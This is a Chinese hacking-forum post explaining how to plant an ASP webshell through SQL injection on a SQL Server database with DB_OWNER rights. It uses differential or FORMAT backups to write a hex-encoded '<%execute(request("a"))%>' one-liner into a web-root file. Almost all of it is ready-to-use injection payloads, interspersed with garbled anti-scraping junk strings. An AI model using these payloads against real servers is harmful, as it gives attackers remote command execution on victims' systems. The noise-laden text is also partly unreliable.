DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

( o% b3 \$ {' `/ g( d. E+ p减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL
9 x2 z  G" w2 F  {& G  M
* c1 N) b$ z- N/ e; @% h: ~1
2
: e' }! q3 ~% d3
4
$ _" _, B2 n' [( t  G4 @ declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
: {) A+ R! X) E& c# t1 `+ E0 mcreate table [dbo].[xiaolu] ([cmd] [image]);
7 d0 x7 @8 @2 o; d9 H0 V( oinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( u! \" f) d; [& S  L+ ~declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
加一个参数WITH FROMAT
. B# x) d' c, x4 I, [有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1
2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
- N* F7 I4 d+ Lcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
; D9 y$ k8 e$ z8 X2 v
总的来说就是那么简单几句,下面以备份数据库model为例子
5 o; x) P1 N9 V: w* W" d1

1
( r  m( U* q# F id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

; s0 |# r4 y4 S3 ^2

1
id=1;backup database model to disk='你的路径‘ with differential,format;--